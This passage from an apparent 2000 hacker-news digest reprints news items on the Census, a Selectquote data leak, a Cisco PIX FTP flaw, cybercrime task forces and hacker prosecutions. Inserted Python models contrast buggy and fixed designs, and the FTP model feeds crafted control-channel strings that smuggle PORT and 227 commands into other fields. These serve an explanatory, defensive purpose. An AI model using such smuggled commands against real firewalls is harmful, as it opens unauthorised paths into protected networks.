      Moreover, since the 1930s, the Census Bureau, backed by the U.S. Supreme 
      Court, has jealously guarded its records; in 1942, it even rebuffed a 
      demand from the U.S. War Department for information on potential draftees.

      Census officials, for their part, take the once-a-decade privacy 
      complaints in stride as they collect the statistics for use in redrawing 
      congressional districts and determining federal funding formulas.

      Questions about household income, for example, are used to estimate the 
      number of subsidized lunches the neighborhood school might have to 
      provide.

      This year's new question about whether a resident provides primary care 
      for a grandchild is linked to welfare allocations.

      Maury Cagle, a bureau spokesman, said that even though the agency's 
      confidentiality record is clean, "people have an ingrained suspicion about 
      computers and private information. All of those things add to the falling 
      response rate."

      The Census Bureau projects its response rate for the 2000 Census will hit 
      its lowest level ever: 61 percent, down from 75 percent in 1980.

      As the response rate drops, the government has to hire ever more 
      head-counters - "enumerators," in bureau jargon - to brave back streets 
      and barking dogs to get the information personally.

      This year, the Census Bureau is mounting a $230 million outreach campaign 
      designed to raise the response rate and keep down the expense of 
      enumerators.

      Still, "people are a little more testy" about giving out personal 
      information than in years past, said Gorden DeJong, director of 
      Pennsylvania State University's Population Research Institute.

      DeJong and others blame everything: a spate of high-profile computer 
      attacks; rising concerns about confidentiality; a constant if sometimes 
      fluctuating distrust of government; and an ever-widening flood of private 
      surveys and junk mail with which Americans already contend.

      "For the number of things I get in the mail, I already must be on 50 
      lists," said Alessandroni, 84, a retired lawyer from Philadelphia. "It's 
      pretty obvious to me that there's no such thing as secrecy. . . . The 
      information is bound to get around."

      In the last two weeks, either the long form or a separate three-page short 
      form was mailed to 113 million households.

      An additional 22 million households with incomplete addresses or post 
      office boxes were having their forms hand-delivered. Households that don't 
      return the form by April 1 may get a visit from an enumerator.

      Every sixth household got a long form. The ratio was set by a scientific 
      sampling formula, and people may not fill out a long form unless they were 
      selected, said Phillip Lutz, assistant regional manager for the Census 
      region comprising Pennsylvania, New Jersey, Maryland, Delaware, and 
      Washington.

      Each form arrives bearing the bold-faced words: "Your Response is Required 
      by Law." What is not written is the fact that the $100 fine for failing to 
      respond - a fine dating to at least 1954 - apparently has not been imposed 
      in decades, even though federal courts have upheld the constitutionality 
      of the participation law.

      "We're not interested in fining people. We're interested in collecting 
      information," Lutz said.

      Still, some people are willing, even eager, to pay the fine rather than 
      give up personal information.

      "I wrote the number of people living in my house and enclosed a $100 
      check," said a 41-year-old participant in an Internet chat room about the 
      Census, who spoke on condition that only his first name, Greg, be printed. 
      "Why is it any of their business how I am paying or have paid for my 
      home?"

      So far, the refusers appear to be in the minority. State and local 
      officials across the country have joined with community and immigrant 
      groups to push for full participation, arguing that the sacrifice pays off 
      in federal funding.

      Pennsylvania officials have estimated that each person counted in 
      Philadelphia is worth an average of $2,200 in federal funds.

      "The very people who are not participating need to be counted so they can 
      have government services in their neighborhood," said Kate Kunda, 45, a 
      Spanish teacher from Wayne, Delaware County.

      As for herself, Kunda added: "I was annoyed that they wanted to know about 
      my electricity bill and mortgage, but we did make an effort to fill it 
      out."



      @HWA
      
61.0  HNN:Mar 23rd:Insurance Co. Reveals Personal Info on Web 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by acopalyse 
      A software glitch allowed visitors to Selectquote.com to
      view the personal information of the previous visitor. At
      least 20 users had everything from name and address to
      current insurance coverage and parents health histories
      revealed. 

      MSNBC 
      http://www.msnbc.com/news/385464.asp?0m=T12R
      
      Insurance site exposes personal data
      Glitch on Selectquote site reveals information to next user
      By Mike Brunker 
      MSNBC

      March 22 - Consumers who requested online life
      insurance quotes from Selectquote.com on
      Tuesday and Wednesday got more than they
      bargained for: Thanks to a software glitch, their
      personal information was left on the company's
      Web site for the next user to see.

      THE PROBLEM occurred when a form that
      consumers fill out to request a quote failed to clear the
      contents at the end of the process. This left everything from
      the previous user's name and address to information on
      current coverage and parents' health histories plainly visible
      to the next person to request a quote.

      Lyle Griffin, a spokesman for Selectquote, said the
      problem occurred when programmers fixed a piece of code
      on the site that was causing a problem for users with an
      older version of Internet Explorer. Unfortunately, the fix
      created a problem in the quote request form, he said.

      The problem lasted from 4 p.m. PT on Tuesday until
      about 10 a.m. PT Wednesday, but it affected only about 20
      users who were directed to a newly designed Selectquote
      site that is still being tested, Griffin said.

      "Not to minimize it," he said of the problem.
      "Obviously this is extremely embarrassing."

      MSNBC.com was alerted to the problem late
      Tuesday by a prospective Selectquote customer,
      who was outraged that other visitors to the site
      were able to view her personal information.

      "About 10 minutes (after filling out the form) I got a call
      from a woman in Ohio who said, 'I'm just someone who's
      on Selectquote and all your information is prepopulated in
      the questionnaire,'" said Ona Karasa of Bellevue, Wash.

      She said she went back on the site Wednesday
      morning and saw the information of two other people who
      apparently had just requested life-insurance quotes using the
      online service. MSNBC editors also were able to access
      personal information entered by other users until
      midmorning Wednesday.

      Another user, Richard Underwood of Rockville, Md.,
      said he was alerted to the problem early Wednesday by
      e-mail from another Selectquote surfer. He said a company
      representative had called and left a message concerning his
      request for a quote, but did not mention the Web site
      problem.

      "Truthfully, I don't know if I want to talk to anyone at
      Selectquote about life insurance at this point," he said.

      Underwood said the experience would likely make him
      pause the next time he is prompted to enter personal
      information on a Web site.

      "I was just getting to the point where I was reasonably
      comfortable doing that, but I may have to think twice if this
      is how it works," he said.
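
      The article does not say what the older-IE fix actually broke, so the
      Python model below, added here and not Selectquote's code, shows one
      plausible mechanism for a form that "failed to clear the contents at the
      end of the process": a handler that keeps the form's values in a single
      object shared by every visitor, beside a handler that scopes them to the
      submitting session and discards them once the request is done. The
      field names, session ids and visitor data are constructed for the
      example; leaked_fields() is the kind of check a test suite could run
      against either handler.

```python
import secrets
from html import escape

FIELDS = ("name", "address", "coverage", "family_history")   # constructed field set


def render(values):
    """Render the quote form with the given values pre-filled (empty if absent)."""
    return "\n".join(
        f'<input name="{f}" value="{escape(values.get(f, ""), quote=True)}">'
        for f in FIELDS
    )


class SharedStateQuoteForm:
    """Buggy: one form object serves every visitor and nothing resets it after
    a submission, so the next GET renders the previous visitor's answers.
    (One plausible mechanism only; the article does not give the real cause.)"""

    def __init__(self):
        self.values = {f: "" for f in FIELDS}

    def get(self, session_id):
        return render(self.values)

    def post(self, session_id, submitted):
        self.values.update({f: submitted.get(f, "") for f in FIELDS})
        return "quote requested"


class SessionScopedQuoteForm:
    """Fixed: values live only in the submitting session, are handed to the
    quote pipeline (not modelled here), and are dropped once that is done."""

    def __init__(self):
        self.sessions = {}

    def get(self, session_id):
        return render(self.sessions.get(session_id, {}))

    def post(self, session_id, submitted):
        self.sessions[session_id] = {f: submitted.get(f, "") for f in FIELDS}
        # ... hand self.sessions[session_id] to the quote pipeline here ...
        self.sessions.pop(session_id, None)      # clear at the end of the process
        return "quote requested"


VISITOR_A = {                                   # constructed sample data
    "name": "A. Visitor",
    "address": "1 Example Street",
    "coverage": "term life, 250k",
    "family_history": "sample entry",
}


def leaked_fields(handler):
    """Drive two visitors through a handler: A submits, then B asks for a
    blank form. Return the names of A's fields that show up in B's form."""
    session_a, session_b = secrets.token_hex(8), secrets.token_hex(8)
    handler.post(session_a, VISITOR_A)
    form_for_b = handler.get(session_b)
    return sorted(f for f, v in VISITOR_A.items() if escape(v, quote=True) in form_for_b)


if __name__ == "__main__":
    print("shared state leaks:  ", leaked_fields(SharedStateQuoteForm()))
    print("session scoped leaks:", leaked_fields(SessionScopedQuoteForm()))
```

      The same two-visitor check is worth keeping as a regression test for
      any form that pre-fills from server-side state, since the bug is easy
      to reintroduce by an unrelated change, as happened here. Serving the
      pre-filled page with Cache-Control: no-store closes the related hole
      where a shared cache in front of the site hands one visitor's page to
      the next.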
                                
      
      @HWA


62.0  HNN:Mar 23rd:Cisco Admits to Big Hole in PIX Firewall 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/


      contributed by acopalyse 
      Last week Cisco admitted that it is possible to fool the
      PIX stateful inspection into opening up arbitrary TCP
      ports, which could allow attackers to circumvent
      defined security policies. The vulnerabilities affect any
      PIX firewall with the FTP fixup enabled, which it is by
      default. 

      Vnunet 
      http://www.vnunet.com/News/601083

       Networking - John Leyden, Network News [22 Mar 2000]
 
      Cisco admits to serious PIX firewall flaw
 
 
      Cisco last week admitted that two security vulnerabilities
      affecting its PIX firewalls could leave corporate networks
      open to attack. 
 
      In an interim security notice, the vendor acknowledged the
      existence of two related vulnerabilities that both cause its
      Secure PIX Firewalls to interpret FTP (File Transfer Protocol)
      commands out of context, leaving the networks behind the
      firewalls open to penetration. 
 
      Cisco said that in certain configurations "it is possible to fool
      the PIX stateful inspection into opening up arbitrary TCP
      ports, which could allow attackers to circumvent defined
      security policies". 
 
      All Cisco Secure PIX Firewalls with software versions up to
      and including 4.2(5), 4.4(4), and 5.0(3), that are configured
      to provide access to FTP services, are at risk from both
      vulnerabilities. Cisco admitted that the problem means any
      Cisco Secure PIX Firewall with the FTP fixup enabled could
      allow unauthorised data to reach the network it is designed
      to protect. 
 
      Deri Jones, managing director of security tester NTA Monitor,
      described the issue as "serious", particularly because Cisco's
      offering is currently the third most popular firewall in the
      market. 
 
      "To Cisco's credit it has issued a bulletin, but has not yet
      found any solutions. This will not be trivial to address and
      may take it some time," warned Jones. 
 
      Clive McCafferty, managing director of security consultant
      CenturyCom, said that many users, which include BT, use
      Cisco's PIX firewalls for managed services. 
 
      "This could allow an attacker to send spurious stuff and then
      launch an attack when a port is open," said McCafferty. 
 
      The first vulnerability, which remains unfixed, is exercised
      when a client inside the firewall browses to an external
      server and selects a link that the firewall interprets as two or
      more FTP commands. The client begins an FTP connection as
      expected, and at the same time unexpectedly executes
      another command opening a separate connection through
      the firewall. 
 
      The only solution Cisco currently suggests for this problem is
      disabling incoming FTP services. Any server that permits
      internal clients to make arbitrary outbound FTP connections
      may be vulnerable to this issue. 
 
      The second, related problem is exercised when the firewall
      receives an error message from an internal FTP server
      containing an encapsulated command that the firewall
      interprets as a distinct command. This can be exploited to
      open a separate connection through the firewall. 
 
      Both vulnerabilities are due to the FTP fixup (the
      "fixup protocol ftp <port>" command), which is enabled by
      default on the Cisco Secure PIX Firewall. To exploit the
      security flaws, attackers must be able to make connections
      to an FTP server protected by the PIX Firewall. 
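
      To make the failure mode concrete, here is a small Python model of an
      FTP fixup, added here and not taken from Cisco or the PIX code: a naive
      inspector that scans every segment for PORT commands and 227 replies
      wherever they appear, beside a stricter one that reassembles the
      control channel one complete line at a time, treats only the first
      token of a line as a command, honours a PORT only when it names the
      client's own address and an unprivileged port, and honours a 227 only
      when it arrives as the reply code to an outstanding PASV and names the
      server's own address. The addresses, the directory name carrying an
      embedded PORT, and the echoed error reply are all constructed for the
      example; they stand in for the "link interpreted as two commands" and
      "error message containing an encapsulated command" cases described
      above, not for any specific exploit string.

```python
import re

# Toy model of an FTP fixup (application-layer inspection) on a stateful
# firewall. Constructed illustration only: this is not Cisco code and does
# not reproduce the PIX implementation.

PORT_RE = re.compile(rb"PORT (\d+),(\d+),(\d+),(\d+),(\d+),(\d+)")
PASV_RE = re.compile(rb"227 .*?\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)\.?")


def _endpoint(match):
    """Turn the h1,h2,h3,h4,p1,p2 form into ('h1.h2.h3.h4', port)."""
    a, b, c, d, p1, p2 = (int(x) for x in match.groups())
    return f"{a}.{b}.{c}.{d}", (p1 << 8) | p2


class NaiveFixup:
    """Opens a pinhole for every PORT/227 pattern found anywhere in a segment,
    with no regard to line boundaries, protocol state or the address named."""

    def __init__(self):
        self.pinholes = []

    def client_to_server(self, data):
        self.pinholes += [_endpoint(m) for m in PORT_RE.finditer(data)]

    def server_to_client(self, data):
        self.pinholes += [_endpoint(m) for m in PASV_RE.finditer(data)]


class StrictFixup:
    """Reassembles complete CRLF-terminated lines per direction, treats the
    first token of a line as the only command on it, and checks that the
    advertised endpoint belongs to the party that advertised it."""

    def __init__(self, client_ip, server_ip):
        self.client_ip, self.server_ip = client_ip, server_ip
        self.pasv_pending = False
        self.pinholes, self.rejected = [], []
        self._buf = {"c2s": b"", "s2c": b""}

    def _lines(self, direction, data):
        # Buffer per direction so a command split across segments is seen whole.
        self._buf[direction] += data
        while b"\r\n" in self._buf[direction]:
            line, self._buf[direction] = self._buf[direction].split(b"\r\n", 1)
            yield line

    def client_to_server(self, data):
        for line in self._lines("c2s", data):
            verb = line.split(b" ", 1)[0].upper()
            if verb == b"PASV":
                self.pasv_pending = True
            elif verb == b"PORT":
                m = PORT_RE.fullmatch(line)          # the whole line, nothing appended
                ep = _endpoint(m) if m else None
                if ep and ep[0] == self.client_ip and ep[1] > 1023:
                    self.pinholes.append(ep)
                else:
                    self.rejected.append(line)

    def server_to_client(self, data):
        for line in self._lines("s2c", data):
            if not line.startswith(b"227 "):        # 227 must be the reply code itself
                continue
            m = PASV_RE.fullmatch(line)
            ep = _endpoint(m) if m else None
            if self.pasv_pending and ep and ep[0] == self.server_ip:
                self.pinholes.append(ep)
            else:
                self.rejected.append(line)
            self.pasv_pending = False


def run_scenarios(client_ip="10.0.0.7", server_ip="10.0.0.5"):
    """Feed constructed control-channel traffic through both inspectors and
    return {scenario: (naive_pinholes, strict_pinholes)}."""
    scenarios = {
        # ordinary active-mode transfer: client asks for 10.0.0.7:2001
        "legit_port": [("c2s", b"PORT 10,0,0,7,7,209\r\n")],
        # ordinary passive-mode transfer: server answers PASV with 10.0.0.5:1025
        "legit_pasv": [("c2s", b"PASV\r\n"),
                       ("s2c", b"227 Entering Passive Mode (10,0,0,5,4,1).\r\n")],
        # server echoes a bogus command inside an error reply; the quoted text
        # looks like a 227 advertising the server's port 22 (constructed)
        "echoed_reply": [("s2c", b"500 'XX 227 Entering Passive Mode (10,0,0,5,0,22)': "
                                 b"command not understood\r\n")],
        # one client command whose argument carries a PORT for 10.0.0.7:139 (constructed)
        "embedded_port": [("c2s", b"CWD /pub PORT 10,0,0,7,0,139\r\n")],
    }
    results = {}
    for name, traffic in scenarios.items():
        naive, strict = NaiveFixup(), StrictFixup(client_ip, server_ip)
        for direction, data in traffic:
            for fw in (naive, strict):
                (fw.client_to_server if direction == "c2s" else fw.server_to_client)(data)
        results[name] = (naive.pinholes, strict.pinholes)
    return results


if __name__ == "__main__":
    for name, (naive, strict) in run_scenarios().items():
        print(f"{name:14s} naive opens {naive}   strict opens {strict}")
```

      The two legitimate scenarios open the same pinhole under both
      inspectors; the two crafted ones open an inbound path to port 22 on the
      server and to port 139 on the client under the naive inspector and
      nothing under the strict one. Line reassembly and the "first token is
      the command" rule are what defeat out-of-context parsing; the address
      and low-port checks are defence in depth, since they also stop a
      correctly framed command from pointing the firewall at a third host.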
 
    
       
      @HWA


63.0  HNN:Mar 23rd:College To Offer Online Crime Fighting Courses 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Lew 
      A new state-of-the-art computer lab was unveiled by
      officials at the College of DuPage in Illinois on Monday at
      the college's Suburban Law Enforcement Academy. The
      lab will offer police officers (no civilians allowed) courses
      in reconstructing an electronic crime scene, as well as
      how to present such evidence in court. The lab, valued
      at $250,000, was donated by Microsoft Corp. and Omni
      Tech Corp. 

      Chicago Tribune - Registration Required 
      http://chicagotribune.com/news/metro/dupage/article/0,2669,SAV-0003210202,FF.html
      <bleh>
      
      @HWA


64.0  HNN:Mar 23rd:Pittsburgh Gets Computer Crime Task Force 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/


      contributed by acopalyse and Evil Wench 
      A joint operation of federal and local authorities named
      the Pittsburgh High Tech Computer Crimes Task Force
      will try to help in the fight against cyber crime. The
      Task Force was announced on Tuesday at the
      Pittsburgh FBI offices. 

      Pittsburgh Tribune
      http://www.triblive.com/digage/dfbi0323.html
      
      Pittsburgh Post Gazette 
      http://www.post-gazette.com/regionstate/20000322cybercrime1.asp
      
      Tribune;
      
      FBI installs new task force aimed at fighting cybercrimes
    
      By Erik Siemers
      TRIBUNE-REVIEW
    
      The aqua Macintosh G3 computer, its electronic guts
      exposed, appeared harmless as it sat on a table in the
      Pittsburgh FBI offices Tuesday. 
    
      But its hard drive tells investigators a different story - it
      was used to print counterfeit corporate checks. 
    
      That Macintosh is one of the computers under
      examination by the Pittsburgh High Tech Computer
      Crimes Task Force. 
    
      The medley of federal and local authorities trained to
      investigate computer-related crimes was unveiled
      yesterday. 
    
      The task force, one of the first in the nation, pools
      experts from local agencies such as Pittsburgh police
      with federal agencies such as the Secret Service and the
      Internal Revenue Service into one room to combat the rapid growth of cybercrimes. 
    
      "Crimes we couldn't have conceived years ago are now routine," said U.S. Attorney Harry S.
      Litman, whose office is involved in the task force. "It is critical that we respond to these crimes by
      marshaling our resources." 
    
      Western Pennsylvania is open to crimes such as hacker attacks and "a whole array of Internet
      fraud," partly because it has more software development firms than Silicon Valley, Litman said. 
    
      "Our position poses significant vulnerability to cybercrimes," Litman said. 
    
      The task force will be free to use each agency's resources along with those at Carnegie Mellon's
      Computer Emergency Response Team, said Richard D. Pethia, manager of CERT's networked
      systems survivability program. CERT will provide technical assistance to the task force, Pethia said. 
    
      Each agency offers one representative to the task force who has been trained in forensic
      examinations of computers, said Dan Larkin, supervisor in charge of the FBI's White Collar and
      Computer Crimes Division. 
    
      Aside from providing intelligence and technical assistance to computer investigations, the task force
      will focus on investigations where the Internet was used as the main tool in committing the crime. 
    
      Michael Vatis, director of the FBI's National Infrastructure Protection Center in Washington, D.C.,
      said all FBI field offices will eventually house task forces similar to Pittsburgh's. 
    
      Pittsburgh is one of the initial task force sites partly because "we have a wealth of talent," said John
      P. Joyce, assistant special agent in charge of the FBI's Pittsburgh office. 
    
      The city also has a good track record for law enforcement agencies working with each other and
      with Carnegie Mellon's technology resources, said FBI Special Agent Bill Crowley. 
    
      Task force members will use traditional investigation skills along with advanced knowledge of
      technology to crack computer cases, said Vatis. 
    
      "We need to have the technology to get the digital evidence," Vatis said. 
    
      Getting that digital evidence can be as simple as copying the contents of the hard drive for analysis
      on its own computers, said Special Agent Tom Hyslip, the Secret Service's representative to the
      task force. 
    
      "When we go to court we can say we never touched (the evidence)," Hyslip said. 
      
      -=-
      
      Gazette;
      
      City at forefront of war on cybercrime 

      FBI forming task forces to fight crimes of Internet age 
 
      Wednesday, March 22, 2000
 
      By Torsten Ove, Post-Gazette Staff Writer 
 
      With its aging population and Rust Belt image, Pittsburgh may hardly seem
      like the kind of town the federal government would choose as a base for its
      war on sophisticated cybercrime. 
 
      But yesterday, as local law enforcement officers stood stiffly for the cameras
      at FBI headquarters Downtown, authorities announced the creation of the
      nation's first task force specifically designed to combat computer intrusion,
      Web site vandalism, on-line espionage and other crimes of the rapidly
      evolving Internet age. 
 
      "This is the future, but it is also very much the present," said Michael Vatis, the
      FBI's top cybercop. "This is putting Pittsburgh at the cutting edge of
      cybercrime prevention." 
 
      The task force, comprised of federal, state and local agencies, is one of 16
      planned nationwide in major cities. 
 
      Pittsburgh was chosen because of the prevalence of software development
      companies here and the presence of Carnegie Mellon University's Computer
      Emergency Response Team, the nation's leading cybercrime research facility. 
 
      In addition to focusing on complex computer and Internet crimes, FBI officials
      said the local task force will provide technical assistance to police
      departments in investigations of fraud, child pornography and identity theft that
      involve computers. 
 
      Vatis, director of the National Infrastructure Protection Center in Washington,
      D.C., said computers are changing the face of crime so quickly that law
      enforcement agencies have to work together to keep up. 
 
      In addition to working to combat large-scale attacks such as the one that
      disabled Yahoo!, eBay and other e-commerce Web sites last month, federal
      authorities have been scrambling to head off all manner of computer crimes,
      from organized hacking of government computers by suspected foreign agents
      to amateur vandalism such as that committed by the teen-ager who vandalized
      an anti-drug Web site with pictures of Beavis and Butthead. 
 
      Locally, FBI Special Agent John P. Joyce said his agency is investigating 30
      to 40 cases of computer intrusion and similar crimes, although he wouldn't
      reveal details of any of them. Because of their technical nature, each
      investigation requires much more expertise than the traditional capers tackled
      by FBI agents of old. The new breed of federal crime fighter is more likely to
      be an agent sitting at a computer all day than a suit-and-tie swashbuckler with
      a gun kicking down doors. 
 
      "These cases are a lot more complicated than physical crime," said Vatis, "and
      they take a longer time to solve." 
 
      Richard D. Pethia of CMU's CERT warned that the "denial of service"
      attacks that knocked the Internet companies off-line in February are only the
      beginning of new waves of cyberspace assaults. In 1998, he said, his center
      examined 4,000 incidents. Last year, the number reached 8,000. This year, it
      could double again. 
 
      "This problem is real and it's here," he said. "The nasty thing about computer
      attacks is that they can be launched from anywhere on the planet." 
 
      And it can be nearly impossible to track down the culprits and then prove
      they are responsible for specific on-line exploits. The attacks on the
      e-commerce companies, for example, remain unsolved, although Vatis said
      the FBI is making progress in the case. 
 
      Not everyone is convinced the federal government, working with experts in
      the private sector, has what it takes to match wits with serious hackers bent
      on mayhem. 
 
      "If I were a cyber criminal with the FBI after me, I would sleep like a baby,"
      said Jay Valentine, president of InfoGlide Corp., an Internet security
      company, in a recent Scripps Howard report about Internet security. "Even a
      blind squirrel finds a nut, but the FBI will only catch amateurish hackers. The
      best ones are a generation ahead of the FBI."
 
      Other critics have blasted the FBI and the National Infrastructure Protection
      Center for reacting too slowly to the attacks on 30 university systems last year
      that laid the groundwork for the e-commerce shutdown last month. 
 
      In a USA Today report, experts -- many of them cybersleuths selling their
      services -- also said the government's efforts were hindered by inter-agency
      squabbling and the fact that some companies don't trust the FBI enough to
      share information with agents. 
 
      Vatis wouldn't address the USA Today report except to say that it was
      inaccurate. 
 
      Regarding the charge of slow government reaction, he said the protection
      center issued a warning about the denial-of-service threat in plenty of time. 
 
      The National Infrastructure Protection Center's Web site shows the warning
      went out on Dec. 30 and included detailed information about what defensive
      steps to take. 
 
      Still, Vatis acknowledged that government agencies are "still in the process of
      getting up to speed."



      @HWA
      
65.0  HNN:Mar 23rd:Business May Be Protected Against FOIA 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/


      contributed by acopalyse 
      To encourage companies to release information about
      online attacks a new bill would provide firms with an
      exemption to the Freedom of Information Act.
      Representatives Tom Davis, R-Va. and Jim Moran, D-Va.
      plan to introduce the bill later this week. It is hoped
      that this exemption will promote the reporting of cyber
      attacks by industry. (And at the same time erode
      citizens rights.) 

      Newsbytes 
      http://www.newsbytes.com/pubNews/00/146086.html
      
      Bill Would Protect Firms That Share Hacking Info 

                  
      By David McGuire, Newsbytes WASHINGTON, DC, U.S.A., 21 Mar 2000, 6:00 AM CST

      A new bill aimed at encouraging companies to share information about 
      hacker attacks would provide firms with a limited exemption from the 
      Freedom of Information Act (FOIA). 

      Set to be introduced by Reps. Tom Davis, R-Va. and Jim Moran, D-Va., later 
      this week, the legislation would allow companies to share information 
      about cyberattacks with law enforcers and industry groups, without 
      worrying that such information could come back to haunt them, Davis 
      staffer David Marin said today. 

      "The public interest will be served by companies coming forth to share 
      their information" about attacks, Marin said. Too often now companies do 
      not report cyberattacks for fear that such reports will find their way 
      into the media, he said. 

      While the bill would create a limited shelter under FOIA, it is not 
      intended to allow companies to mask their business dealings, Marin said. 

      When the legislation is completed it will be "narrowly tailored to address 
      (information pertaining to) how the attack was done and what was done to 
      fix the attack," Marin said. The legislation will apply only to 
      telecommunications and information technology infrastructure attacks. 

      Used primarily by the media, FOIA allows members of the press and the 
      public to file legally binding requests for public documents. 

      FOIA already contains an exemption for ongoing criminal investigations, but 
      Davis and Moran are aiming to further protect firms that divulge 
      information about cyberattacks, Marin said. 

      Reported by Newsbytes.com, http://www.newsbytes.com .       
      
      
      @HWA


66.0  HNN:Mar 23rd:Teenagers To Receive Deterrent Sentences 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/


      contributed by acopalyse 
      After selling stolen logon names and passwords three
      teenagers in Hong Kong were warned by Magistrate Ian
      Candy that they faced deterrent sentences. The three
      plead guilty to a total of 49 charges including the
      downloading and selling of music files. Sentencing has
      been scheduled for April 5th. 

      South China Morning Post        
      http://www.technologypost.com/features/Daily/20000322105804432.asp?Section
      
      FEATURES 

           Teen hackers face
          deterrent sentences 

      ELAINE PAK LI 

      Three teenage computer hackers were warned
      yesterday that they faced deterrent sentences after they
      admitted selling login names and passwords stolen from
      the Internet in the first case of its kind in Hong Kong. 

      One of the trio, a student, was also convicted of
      downloading songs from the Internet and selling them
      for profit. 

      At Eastern Court, restaurant manager Tam Hei-lun and
      clerk Po Yiu-ming, both 19, and student Mak
      King-lam, 18, pleaded guilty to a total of 49 charges. 

      Magistrate Ian Candy remanded them in custody for
      sentencing on April 5, pending reports, and said: "It is
      precisely these kinds of computer crimes which leave
      Internet users in fear and make them pause before
      conducting even the most basic of transactions. 

      "These criminal activities should be nipped in the bud
      and a deterrent sentence must be imposed." 

      All the offences took place between March 1998 and
      May last year. 

      David Leung, prosecuting, told the court Po had hacked
      into other Internet users' computers and unlawfully
      obtained 127 login names and passwords given to
      Internet users when they subscribe to an Internet service
      provider for a monthly fee and an hourly rate. 

      The three defendants knew each other through the
      Internet and Po had sold some of his illegally obtained
      login names and passwords to Tam for $3,000, but
      gave others for free to Mak. Tam later resold them for
      $1,500. 

      The three were aware that the information they obtained
      was acquired illegally, the magistrate was told. 

      Mr Leung said the three defendants had hacked into the
      accounts of Internet users of Hongkong Telecom IMS
      Netvigator, Vision Network Ltd, City Telecom (HK),
      Netfront Information Technology and ABC Net, saving
      themselves the monthly fees and causing losses to the
      account holders. 

      Tam admitted 14 counts of obtaining access to a
      computer with a view to dishonest gain, Po admitted 12
      and Mak two. 

      Mak also admitted 10 charges of selling pirated discs, in
      which he downloaded songs from the Internet and sold
      200 discs from his own Web site. Each disc contained
      100 songs and was priced at $88. 

      Tam, who asked buyers of the logins to deposit money
      into his bank account, also admitted eight counts of
      dealing with property known or reasonably believed to
      represent proceeds of an indictable offence. 

      Po admitted a further three charges of criminally
      damaging the computers of three users.
 
      
      @HWA
      
      
67.0  HNN:Mar 24th:2600 Retains Big name Attorneys - Trial Date Set 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Macki 
      Martin Garbus, an internationally distinguished New York
      attorney, and his firm (Frankfurt, Garbus, Klein, and
      Selz) have been retained by the defense in the New
      York MPAA DeCSS case. Two of the three defendants
      have withdrawn under consent agreements, leaving only
      2600 Magazine and its publisher Emmanuel Goldstein, as
      defendant. A trial date has been set for December 5,
      2000. 

      2600 
      Electronic Frontier Foundation - They are providing funding, please show
      your support! 
      
      http://www.2600.com/news/2000/0324.html
      
      http://www.eff.org
      
      TRIAL DATE SET IN DECSS CASE - WORLD RENOWNED
      LEGAL TEAM TAKES CASE 
 
      03/24/00 
 
      The importance of the fight against the MPAA and
      the DVD Copy Control Association was underlined
      this week with the hiring of the legal team of
      Frankfurt, Garbus, Klein, and Selz to represent
      2600. 
 
      Martin Garbus, who will be the key lawyer on our
      side, has defended the likes of Lenny Bruce,
      Spike Lee, Samuel Beckett, Andrei Sakharov, and
      Vaclav Havel and is the author of "Tough Talk,"
      published in 1998. He is a renowned First
      Amendment attorney and, thanks to funding from
      the Electronic Frontier Foundation, we have him
      in our court. Please show your support to the
      EFF for taking on this important case and help
      them to play a key role in whatever cases come
      up in the future. 
 
      We've already seen a significant development
      this week as we have been granted the time we
      need to build our defense. The court was
      prepared to start the trial on May 1st which is
      what the plaintiffs wanted. After presenting our
      arguments, we were given a court date of
      December 5th. This is a very good development
      for us as there is much to be prepared. An
      uninformed court would have been bad for all of
      us. 
 
      As the weeks and months progress, we will be in
      need of expert witnesses and testimony
      supporting our position. Your help and support
      will be invaluable as always. We will keep you
      updated as events progress. 
       
      
      @HWA


68.0  HNN:Mar 24th:Max Vision Indicted in San Jose 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/


      contributed by McIntyre 
      A suspect in computer break-ins at NASA and the U.S.
      departments of energy, defense and transportation made
      his first court appearance in San Jose on Wednesday. The
      indictment of Max Vision (Max Ray Butler) of Berkeley
      included charges of unauthorized access of a computer,
      recklessly causing damage and interception of electronic
      communication, for a total of 15 counts. Max Vision was
      previously an FBI informant; he turned himself in on
      Tuesday. 

      Associated Press - via Yahoo 
      http://dailynews.yahoo.com/h/ap/20000323/us/hacker_indicted_1.html
      
      Wednesday March 22 11:56 PM ET 

      Suspected Gov't Hacker Indicted

      SAN FRANCISCO (AP) - A suspected computer hacker made his first court 
      appearance Wednesday after being indicted on charges of breaking into 
      computers belonging to NASA and the U.S. departments of energy, defense 
      and transportation, said federal prosecutors.

      Max Ray Butler, 27, of Berkeley was ordered held on $100,000 bail during 
      the hearing in San Jose. On March 15, he was indicted on 15 criminal 
      counts, including unauthorized access of a computer, recklessly causing 
      damage and interception of electronic communication.

      All the counts carry sentences of at least six months and fines of 
      hundreds of thousands of dollars.

      Butler, who also goes by the name of Max Vision, had been an FBI source, 
      helping agents solve computer crimes, authorities said. He turned himself 
      in on Tuesday.

      Butler's attorney did not return a telephone call seeking comment. 
      
      -=-
      
      More:
      
      (SfGate)
      http://www.sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/2000/03/24/MN57003.DTL
      
      
      FBI Computer Expert Accused of Hacking 

      Henry K. Lee, Chronicle Staff Writer 

      Friday, March 24, 2000 



      Max Ray Butler seemed to be at the top of his game. For two years, the 
      computer expert was a confidential source for an elite FBI computer crime 
      squad, helping to ferret out scofflaws on the Internet. 

